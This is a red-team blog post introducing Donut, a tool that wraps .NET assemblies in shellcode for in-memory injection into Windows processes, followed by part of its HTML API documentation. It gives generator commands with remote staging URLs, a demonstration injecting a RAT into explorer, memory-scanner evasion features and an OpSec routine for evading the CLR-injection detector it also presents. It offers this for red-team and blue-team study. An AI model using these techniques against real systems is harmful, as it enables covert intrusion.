51 | To move past these limitations, we need a technique that meets the following requirements: | |
52 | ||
53 | * Allows you to run .NET code from memory. | |
54 | * Can work with any Windows process, regardless of its architecture and whether it has the CLR loaded. | |
55 | * Allows you to inject that code in either a remote (different) process or the local (current) process. | |
56 | * Allows you to determine in what way that injection occurs. | |
57 | * Works with multiple types of process injection. | |
58 | ||
59 | The most flexible type of payload that meets those requirements is shellcode. But you can't just convert a .NET Assembly to shellcode. They run through a runtime environment, not directly on the hardware. Wouldn't it be great if we could just inject .NET Assemblies as shellcode? Yes. Yes, it would. | |
60 | ||
61 | # Introducing Donut | |
62 | ||
63 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/donut.png) | |
64 | ||
65 | ```Shortly before publishing donut, Odzhan and I became aware of another team working on a shellcode generator for .NET Assemblies. They were at the same stage of their project as us. We both agreed that whichever of us published first would ensure that the other received due credit for their work. As soon as they publish their tool, we will update this article with a link.``` | |
66 | ||
67 | Donut is a shellcode generation tool that creates x86 or x64 shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
68 | ||
69 | Donut is currently at version 0.9 (Beta). Please share any issues or suggestions with us as Issues on GitHub. Once we have received feedback, we will release version 1.0. A link to the compiled v0.9 release can be found [here](https://github.com/TheWover/donut "Release 0.9"). | |
70 | ||
71 | # How it Works | |
72 | ||
73 | ## Unmanaged Hosting API | |
74 | ||
75 | Microsoft provides an API known as the [Unmanaged CLR Hosting API](https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/). This API allows unmanaged code (such as C or C++) to host, inspect, configure, and use Common Language Runtimes. It is a legitimate API that can be used for many purposes. Microsoft uses it for several of their products, and other companies use it to design custom loaders for their programs. It can be used to improve performance of .NET applications, create sandboxes, or just do weird stuff. We do the latter. | |
76 | ||
77 | One of the things it can do is manually load .NET Assemblies into arbitrary [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains). It can do this either from disk or from memory. We utilize its capability for loading from memory to load your payload without touching disk. | |
78 | ||
79 | To see a standalone example of an Unmanaged CLR Hosting Assembly loader, check out Casey Smith's repo: [AssemblyLoader](https://github.com/caseysmithrc/AssemblyLoader) | |
80 | ||
81 | ## CLR Injection | |
82 | ||
83 | The first action that donut's shellcode takes is to load the CLR. Unless the user specifies the exact runtime version to use, v4.0.30319 of the CLR will be used by default, which supports versions 4.0+ of .NET. If the attempt to load a specific version fails, then donut will attempt to use whichever one is available on the system. Once the CLR is loaded, the shellcode creates a new Application Domain. At this point, the .NET Assembly payload must be obtained. If the user provided a staging URL, then the Assembly is downloaded from it. Otherwise, it is obtained from memory. Either way, it will be loaded into the new AppDomain. After the Assembly is loaded but before it is run, the decrypted copy will be released and later freed from memory with VirtualFree to deter memory scanners. Finally, the Entry Point specified by the user will be invoked along with any provided parameters. | |
84 | ||
85 | If the CLR is already loaded into the host process, then donut's shellcode will still work. The .NET Assembly will just be loaded into a new Application Domain within the managed process. .NET is designed to allow for .NET Assemblies built for multiple versions of .NET to run simultaneously in the same process. As such, your payload should always run no matter the process's state before injection. | |
86 | ||
87 | ## Shellcode Generation | |
88 | ||
89 | The logic above describes how the shellcode generated by donut works. That logic is defined in payload.exe. To get the shellcode, exe2h extracts the compiled machine code from the .text segment in payload.exe and saves it as a C array to a C header file. donut combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters). | |
90 | ||
91 | # Using Donut | |
92 | ||
93 | Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Both a Windows EXE and a Python (Python planned for v1.0) script are provided for payload generation. The command-line syntax is as described below. | |
94 | ||
95 | ``` | |
96 | usage: donut [options] -f <.NET assembly> -c <namespace.class> -m <Method> | |
97 | ||
98 | -f <path> .NET assembly to embed in PIC and DLL. | |
99 | -u <URL> HTTP server hosting the .NET assembly. | |
100 | -c <namespace.class> The assembly class name. | |
101 | -m <method> The assembly method name. | |
102 | -p <arg1,arg2...> Optional parameters for method, separated by comma or semi-colon. | |
103 | -a <arch> Target architecture : 1=x86, 2=amd64(default). | |
104 | -r <version> CLR runtime version. v4.0.30319 is used by default. | |
105 | -d <name> AppDomain name to create for assembly. Randomly generated by default. | |
106 | ||
107 | examples: | |
108 | ||
109 | donut -a 1 -c TestClass -m RunProcess -p notepad.exe -f loader.dll | |
110 | donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe -u http://remote_server.com/modules/ | |
111 | ``` | |
112 | ||
113 | ## Generating Shellcode | |
114 | ||
115 | To generate shellcode with donut, you must specify a .NET Assembly, an Entry Point, and any parameters that you wish to use. If your Assembly uses the *Test* namespace and includes the *Program* class with the *Main* method, then you would use the following options: | |
116 | ||
117 | ``` | |
118 | donut.exe -f Test.exe -c Test.Program -m Main | |
119 | ``` | |
120 | ||
121 | To generate the same shellcode for 32-bit processes, use the '-a' option: | |
122 | ||
123 | ``` | |
124 | donut.exe -a 1 -f Test.exe -c Test.Program -m Main | |
125 | ``` | |
126 | ||
127 | You may also provide parameters to whatever Entry Point you specify. The max length of each parameter is currently 32 characters. To demonstrate this functionality, you may use the following options and our example Assembly to create shellcode that will spawn a Notepad process and a Calc process: | |
128 | ||
129 | ``` | |
130 | .\donut.exe -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe | |
131 | ``` | |
132 | ||
133 | When generating shellcode to run on an older Windows machine, you may need it to use v2 of the CLR, rather than v4. v2 works for versions of the .NET Framework <= 3.5, while v4 works for versions >= 4.0. By default, donut uses version 4 of the CLR. You may tell it to use v2 with the '-r' option and specifying "v2.0.50727" as the parameter. | |
134 | ||
135 | ``` | |
136 | .\donut.exe -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe | |
137 | ``` | |
138 | ||
139 | The name of the AppDomain for your .NET payload may be specified manually using the '-d' option. If it is omitted, the name is randomly generated. | |
140 | ||
141 | ``` | |
142 | .\donut.exe -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe | |
143 | ``` | |
144 | ||
145 | In order to reduce the size of your shellcode (or for many other reasons), you may specify a URL where your payload will be hosted. Donut will produce an encrypted Donut Module with a random name that you should place at the URI you specified. The name and location where you should place it will be printed to your screen when you generate the shellcode. | |
146 | ||
147 | ``` | |
148 | .\donut.exe -u http://remote_server.com/modules/ -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe | |
149 | ``` | |
150 | ||
151 | ## Demonstrating with SILENTTRINITY | |
152 | ||
153 | For a demonstration, we will use the [SILENTTRINITY RAT](https://github.com/byt3bl33d3r/SILENTTRINITY "SILENTTRINITY") as a test payload. Since it is the most... ahh... complicated .NET Assembly that I could find, I used it for all of my testing. You may use any standard shellcode injection technique to inject the .NET Assembly. The DonutTest subproject is provided in the repo as an example injector. You may combine it with the DemoCreateProcess subproject to test the shellcode generator. In our case, we will first use DonutTest to inject into explorer. We also show what it looks like to use an existing implant to perform further injection using the ``` boo/shellcode ``` and ``` ipy/execute-assembly ``` post-exploitation modules. | |
154 | ||
155 | ### Generation | |
156 | ||
157 | First, we will generate an x64 PIC using the SILENTTRINITY DLL. Using PowerShell, we will base64-encode the result and pipe it to our clipboard. | |
158 | ||
159 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy.png) | |
160 | ||
161 | Because we don't know what processes will be available to inject into on-target, we will also generate an x86 PIC just in case we need it. | |
162 | ||
163 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy_86.png) | |
164 | ||
165 | If you wanted to, you could use a staging server by providing the URL and copying the Donut Module to the specified location. | |
166 | ||
167 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/generate_URL.png) | |
168 | ||
169 | ### Choosing a Host Process | |
170 | ||
171 | Use ProcessManager, a sub-project provided in the donut repo, to enumerate processes. ProcessManager enumerates all running processes and makes a best effort to obtain information about them. It is specifically designed to aid in determining what process to inject / migrate into. The picture below demonstrates its general usage. | |
172 | ||
173 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ProcessManager.jpg) | |
174 | ||
175 | ### Injecting | |
176 | ||
177 | First, we will use DonutTest to inject into explorer. | |
178 | ||
179 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_inject.jpg) | |
180 | ||
181 | As you can see, the injection was successful: | |
182 | ||
183 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_success.png) | |
184 | ||
185 | Now assume we already have an agent running on the machine. We can use SILENTTRINITY's post-exploitation modules to inject implants into running processes. | |
186 | ||
187 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_through_agent.png) | |
188 | ||
189 | ||
190 | ## Using as a Library | |
191 | ||
192 | donut is provided as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows (*.lib* / *.dll*). It has a simple API that is described in *docs\api.html*. Two exported functions are provided, ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` . | |
193 | ||
194 | ## Rebuilding the shellcode | |
195 | ||
196 | You may easily customize our shellcode to fit your use case. *payload.c* contains the .NET assembly loader, which should successfully compile with both Microsoft Visual Studio and mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever *payload.c* has been changed, recompiling for all architectures is recommended before rebuilding donut. | |
197 | ||
198 | ### Microsoft Visual Studio | |
199 | ||
200 | Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following: | |
201 | ||
202 | ``` | |
203 | nmake clean -f Makefile.msvc | |
204 | nmake -f Makefile.msvc | |
205 | ``` | |
206 | ||
207 | This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates. | |
208 | ||
209 | To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following: | |
210 | ||
211 | ``` | |
212 | nmake clean -f Makefile.msvc | |
213 | nmake x86 -f Makefile.msvc | |
214 | ``` | |
215 | ||
216 | This will save the shellcode as a C array to *payload_exe_x86.h*. | |
217 | ||
218 | ### Mingw-w64 | |
219 | ||
220 | Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following: | |
221 | ||
222 | ``` | |
223 | make clean -f Makefile.mingw | |
224 | make -f Makefile.mingw | |
225 | ``` | |
226 | ||
227 | Once you've recompiled for all architectures, you may rebuild donut. | |
228 | ||
229 | ## Integrating into Tooling | |
230 | ||
231 | We hope that donut (or something inspired by it) will be integrated into tooling to provide **inject** and **migrate** functionality. To do so, we suggest one of the following methods: | |
232 | ||
233 | * As an operator, using the generator to manually generate shellcode. | |
234 | * Generate the shellcode dynamically on your C2 server, pass that down to an existing implant, and inject it into another process. | |
235 | * Use our dynamic or static libraries. | |
236 | * As a template for building your own shellcode / generator. | |
237 | * Use our Python (Python planned for v1.0) extension to script shellcode generation dynamically. | |
238 | ||
239 | # Advancing Tradecraft | |
240 | ||
241 | It is our hope that releasing donut to the public will advance offensive and red team tradecraft in several ways: | |
242 | ||
243 | * Provide red teams and adversary emulators with a means to emulate this technique that threat actors may have developed in secret. | |
244 | * Provide blue teams a frame of reference for detecting and mitigating CLR Injection techniques. | |
245 | * Inspire tool developers to develop new types of techniques and tradecraft. | |
246 | ||
247 | ## Alternative Payloads | |
248 | ||
249 | The main benefit of using .NET Assemblies as shellcode is that they can now be executed by anything that can execute shellcode on Windows. There are many more ways to inject shellcode than there are to load Assemblies. As such, offensive tool designers no longer need to design their payloads around running .NET. Instead, they may leverage their existing payloads and techniques that use shellcode. | |
250 | ||
251 | ## Injecting .NET At Will / Migration | |
252 | ||
253 | Donut will also allow the developers of C2 Frameworks / RATs to add migrate-like functionality to their tools. By using Donut as a library (or calling the generator) on the server and then providing the result to an existing agent, it may inject a new instance of itself into another running process. This may also be used to inject arbitrary post-exploitation modules so long as I/O is properly redirected. | |
254 | ||
255 | ## Disposable AppDomains | |
256 | ||
257 | When donut loads an Assembly, it loads it into a new AppDomain. Unless the user specifies the name of the AppDomain with the '-d' parameter, the AppDomain is given a random name. We specifically designed donut to run payloads in new AppDomains rather than using DefaultDomain. If this does not suit you, you can easily modify payload.c to use the default domain. Running the payload in its own AppDomain allows for the development of tools that run post-exploitation modules in disposable AppDomains. Application Domains can be unloaded, but individual Assemblies cannot. Therefore, to unload an Assembly when you are done with it, you must put it into its own AppDomain and unload that instead. A C# agent can have the shellcode generated on its server, inject the result into itself in a new thread, wait for the Assembly to finish executing, then unload the host AppDomain. You could also modify the shellcode itself to perform that role. | |
258 | ||
259 | ## Detecting CLR Injection | |
260 | ||
261 | One of the companion projects for donut is ModuleMonitor. It uses WMI Event Win32_ModuleLoadTrace to monitor for module loading. It provides filters, detailed data, and has an option to monitor for CLR Injection attacks. | |
262 | ||
263 | The CLR Sentry option follows some simple logic: if a process loads the CLR but its executable image is not a .NET program, then the CLR has been injected into it. | |
264 | ||
265 | While useful, there are both false positives and false negatives: | |
266 | ||
267 | * False Positives: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will flag every unmanaged program that loads the CLR, legitimate or not. | |
268 | * False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So it detects neither use of the Reflection API nor donut being used to inject shellcode into managed processes. | |
269 | ||
270 | Please Note: This is intended **only** as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment. | |
271 | ||
272 | I am not a defender, but the following pseudocode is my attempt at an analytic that follows this logic. The DLLs that are associated with the CLR all start with "msco", such as "mscorlib.dll" and "mscoree.dll". As such, we watch for their loading, then check if the program that loaded them is a valid .NET Assembly. | |
273 | ||
274 | ``` | |
275 | void CLR_Injection: | |
276 | WHEN Image_Load event: | |
277 | if event.Module.Name contains "msco*.dll": | |
278 | if !(IsValidAssembly(event.Process.FilePath)): | |
279 | { | |
280 | print "A CLR has been injected into " + event.Process.Id | |
281 | } | |
282 | ``` | |
283 | ||
284 | The snippet below represents my implementation of this logic in C#. The full code can be found in ModuleMonitor. | |
285 | ||
286 | ```csharp | |
287 | //CLR Sentry | |
288 | //Author: TheWover | |
289 | while (true) | |
290 | { | |
291 | //Get the module load. | |
292 | Win32_ModuleLoadTrace trace = GetNextModuleLoad(); | |
293 | ||
294 | //Split the file path into parts delimited by a '\' | |
295 | string[] parts = trace.FileName.Split('\\'); | |
296 | ||
297 | //Check whether it is a .NET Runtime DLL | |
298 | if (parts[parts.Length - 1].Contains("msco")) | |
299 | { | |
300 | //Get a | |
301 | Process proc = Process.GetProcessById((int) trace.ProcessID); | |
302 | ||
303 | //Check if the file is a .NET Assembly | |
304 | if (!IsValidAssembly(proc.StartInfo.FileName)) | |
305 | { | |
306 | //If it is not, then the CLR has been injected. | |
307 | Console.WriteLine(); | |
308 | ||
309 | Console.WriteLine("[!] CLR Injection has been detected!"); | |
310 | ||
311 | //Display information from the event | |
312 | Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID); | |
313 | } | |
314 | } | |
315 | } | |
316 | ``` | |
317 | ||
318 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/detected.png) | |
319 | ||
320 | It is important to note that this behaviour represents all CLR Injection techniques, of which there are several. This detection should work for donut, as well as other tools such as Cobalt Strike's 'execute-assembly' command. | |
321 | ||
322 | ## OpSec Considerations | |
323 | ||
324 | ModuleMonitor demonstrates an important point about CLR Injection: when performed against unmanaged processes, CLR Injection produces highly anomalous process behavior. The loading of a CLR after a process's initial execution or from unmanaged code is unusual. There are few legitimate use cases. From a defender's perspective, this allows you to build analytics that monitor for the behavior described in the section above. | |
325 | ||
326 | However, as I mentioned, this analytic fails to detect CLR Injection into processes that already have the CLR loaded. As such, an operator could evade the analytic by simply injecting into processes that are already managed. I would recommend the following standard operating procedure: | |
327 | ||
328 | 1. Run ProcessManager from memory to enumerate processes. Take note of which you can inject into. | |
329 | 2. If there are any processes that are already managed, then consider them the set of potential targets. | |
330 | 3. If there are not any managed processes, then all processes are potential targets. | |
331 | 4. Either way, inject / migrate into the process that is most likely to naturally produce network traffic and live the longest. | |
332 | ||
333 | # Conclusion | |
334 | ||
335 | Offensive .NET tradecraft is faced with several important challenges. One of them is the lack of means to inject into remote processes at will. While this can normally be performed with shellcode, there is no way to produce shellcode that can run a .NET Assembly directly on hardware. Any shellcode that runs a .NET Assembly must first bootstrap the Common Language Runtime and load the Assembly through it. Enter Donut. With Donut, we now have a framework for generating flexible shellcode that loads a .NET Assembly from memory. This can be combined with existing techniques and tooling to advance tradecraft in a number of ways. Hopefully, this will break down the current barriers in .NET-based exploitation and provide tool designers with a foundation for crafting more excellent tools. |
0 | ||
1 | <html> | |
2 | <body> | |
3 | ||
4 | <h3>API</h3> | |
5 | ||
6 | <ul> | |
7 | <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li> | |
8 | <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li> | |
9 | </ul> | |
10 | ||
11 | <p>When provided with a valid configuration, <code>DonutCreate</code> will generate shellcode to execute a VBS, JS, EXE, DLL or XSL file in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p> | |
12 | ||
13 | <ol> | |
14 | <li>An encrypted <var>Instance</var></li> | |
15 | <li>An encrypted <var>Module</var></li> | |
16 | <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li> | |
17 | </ol> | |
18 | ||
19 | <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p> | |
20 | ||
21 | <h3>Configuration</h3> | |
22 | ||
23 | <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported) and a path to a VBS/JS/EXE/DLL or XSL file that will be executed in-memory by the shellcode. For a .NET assembly it also requires a namespace/class, the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name, because that will be generated randomly.</p> | |
24 | ||
25 | <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span> | |
26 | <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span> | |
27 | <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span> | |
28 | <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span> | |
29 | <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span> | |
30 | <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span> | |
31 | <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span> | |
32 | <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span> | |
33 | <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span> | |
34 | <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span> | |
35 | ||
36 | <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span> | |
37 | uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span> | |
38 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span> | |
39 | ||
40 | <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span> | |
41 | uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span> | |
42 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span> | |
43 | ||
44 | uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span> | |
45 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span> | |
46 | <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span> | |
47 | </pre> | |
48 | ||
49 | <table border="1"> | |
50 | <tr> | |
51 | <th>Member</th> | |
52 | <th>Description</th> | |
53 | </tr> | |
54 | <tr> | |
55 | <td><code>arch</code></td> | |
56 | <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td> | |
57 | </tr> | |
58 | <tr> | |
59 | <td><code>domain</code></td> | |
60 | <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td> | |
61 | </tr> | |
62 | <tr> | |
63 | <td><code>cls</code></td> | |
64 | <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td> | |
65 | </tr> | |
66 | <tr> | |
67 | <td><code>method</code></td> | |
68 | <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td> | |
69 | </tr> | |
70 | <tr> | |
71 | <td><code>param</code></td> | |
72 | <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td> | |
73 | </tr> | |
74 | <tr> | |
75 | <td><code>file</code></td> | |
76 | <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td> | |
77 | </tr> | |
78 | <tr> | |
79 | <td><code>url</code></td> | |
80 | <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path where the module will be stored. e.g: https://www.rogueserver.com/modules/</td> | |
81 | </tr> | |
82 | <tr> | |
83 | <td><code>runtime</code></td> | |
84 | <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try to read it from the assembly's metadata header. If that fails, v4.0.30319 is used by default.</td> | |
85 | </tr> | |
86 | <tr> | |
87 | <td><code>modname</code></td> | |
88 | <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td> | |
89 | </tr> | |
90 | <tr> | |
91 | <td><code>mod_type</code></td> | |
92 | <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td> | |
93 | </tr> | |
94 | <tr> | |
95 | <td><code>mod_len</code></td> | |
96 | <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td> | |
97 | </tr> | |
98 | <tr> | |
99 | <td><code>mod</code></td> | |
100 | <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td> | |
101 | </tr> | |
102 | <tr> | |
103 | <td><code>inst_type</code></td> | |
104 | <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td> | |
105 | </tr> | |
106 | <tr> | |
107 | <td><code>inst_len</code></td> | |
108 | <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td> | |
109 | </tr> | |
110 | <tr> | |
111 | <td><code>inst</code></td> | |
112 | <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td> | |
113 | </tr> | |
114 | <tr> | |
115 | <td><code>pic_len</code></td> | |
116 | <td>The size of data pointed to by <code>pic</code>.</td> | |
117 | </tr> | |
118 | <tr> | |
119 | <td><code>pic</code></td> | |
120 | <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td> | |
121 | </tr> | |
122 | </table> | |
123 | ||
124 | <p>Everything that follows here concerns the internal workings of Donut and is not required to generate a payload.</p> | |
125 | ||
126 | <h3>Instance</h3> | |
127 | ||
128 | <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p> | |
129 | ||
130 | <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span> | |
131 | <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span> | |
132 | uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span> | |
133 | DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span> | |
134 | ||
135 | uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span> | |
136 | ||
137 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
138 | uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span> | |
139 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span> | |
140 | <span style='color:#696969; '>// include prototypes only if header included from payload.h</span> | |
141 | <span style='color:#004a43; '>      </span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span> | |
142 | <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span> | |
143 | <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span> | |
144 | LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span> | |
145 | GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span> | |
146 | GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span> | |
147 | VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span> | |
148 | VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span> | |
149 | VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span> | |
150 | VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span> | |
151 | Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span> | |
152 | MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span> | |
